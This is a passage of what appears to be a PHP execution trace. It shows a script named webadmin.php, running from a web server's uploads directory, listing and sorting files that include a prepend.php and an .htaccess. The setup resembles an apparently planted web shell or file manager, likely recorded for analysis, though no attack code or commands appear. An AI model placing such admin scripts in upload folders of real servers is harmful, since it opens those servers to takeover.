4	189	1	0.009686	800848
4	189	R			3
4	190	0	0.009699	800816	quicksort	1		/var/www/html/uploads/webadmin.php	915	4	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	0	2	'filename'
5	191	0	0.009744	800816	floor	0		/var/www/html/uploads/webadmin.php	929	1	1
5	191	1	0.009758	800848
5	191	R			1
4		A						/var/www/html/uploads/webadmin.php	929	$cmp = '.'
4		A						/var/www/html/uploads/webadmin.php	931	$l = 0
4		A						/var/www/html/uploads/webadmin.php	932	$r = 2
4		A						/var/www/html/uploads/webadmin.php	937	$r--
4		A						/var/www/html/uploads/webadmin.php	941	$tmp = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/webadmin.php	942	$array[0] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/webadmin.php	943	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/webadmin.php	945	$l++
4		A						/var/www/html/uploads/webadmin.php	946	$r--
5	192	0	0.009920	800816	quicksort	1		/var/www/html/uploads/webadmin.php	952	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	0	0	'filename'
5	192	1	0.009965	800816
5	193	0	0.009972	800816	quicksort	1		/var/www/html/uploads/webadmin.php	953	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	1	2	'filename'
6	194	0	0.010015	800816	floor	0		/var/www/html/uploads/webadmin.php	929	1	1.5
6	194	1	0.010028	800848
6	194	R			1
5		A						/var/www/html/uploads/webadmin.php	929	$cmp = '..'
5		A						/var/www/html/uploads/webadmin.php	931	$l = 1
5		A						/var/www/html/uploads/webadmin.php	932	$r = 2
5		A						/var/www/html/uploads/webadmin.php	937	$r--
5		A						/var/www/html/uploads/webadmin.php	941	$tmp = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/webadmin.php	942	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/webadmin.php	943	$array[1] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
5		A						/var/www/html/uploads/webadmin.php	945	$l++
5		A						/var/www/html/uploads/webadmin.php	946	$r--
6	195	0	0.010177	800816	quicksort	1		/var/www/html/uploads/webadmin.php	952	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	1	0	'filename'
6	195	1	0.010221	800816
6	196	0	0.010229	800816	quicksort	1		/var/www/html/uploads/webadmin.php	953	4	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	2	2	'filename'
6	196	1	0.010271	800816
5	193	1	0.010278	800816
4	190	1	0.010285	800816
4	197	0	0.010293	800840	sizeof	0		/var/www/html/uploads/webadmin.php	918	1	[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	197	1	0.010338	800872
4	197	R			3
4	198	0	0.010351	800840	quicksort	1		/var/www/html/uploads/webadmin.php	918	4	[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]	0	2	'filename'
5	199	0	0.010397	800840	floor	0		/var/www/html/uploads/webadmin.php	929	1	1
5	199	1	0.010409	800872
5	199	R			1
4		A						/var/www/html/uploads/webadmin.php	929	$cmp = 'prepend.php'
4		A						/var/www/html/uploads/webadmin.php	931	$l = 0
4		A						/var/www/html/uploads/webadmin.php	932	$r = 2
4		A						/var/www/html/uploads/webadmin.php	941	$tmp = ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4		A						/var/www/html/uploads/webadmin.php	942	$array[0] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/webadmin.php	943	$array[2] = ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4		A						/var/www/html/uploads/webadmin.php	945	$l++
4		A						/var/www/html/uploads/webadmin.php	946	$r--
4		A						/var/www/html/uploads/webadmin.php	941	$tmp = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/webadmin.php	942	$array[1] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/webadmin.php	943	$array[1] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4		A						/var/www/html/uploads/webadmin.php	945	$l++
4		A						/var/www/html/uploads/webadmin.php	946	$r--
5	200	0	0.010651	800840	quicksort	1		/var/www/html/uploads/webadmin.php	952	4	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]	0	0	'filename'
5	200	1	0.010698	800840
5	201	0	0.010705	800840	quicksort	1		/var/www/html/uploads/webadmin.php	953	4	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]	2	2	'filename'
5	201	1	0.010751	800840
4	198	1	0.010758	800840
4	202	0	0.010766	800840	array_merge	0		/var/www/html/uploads/webadmin.php	921	2	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]	[0 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	202	1	0.010835	801280
4	202	R			[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
3	181	1	0.010907	800416
3	181	R			[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
2		A						/var/www/html/uploads/webadmin.php	1213	$list = [0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' 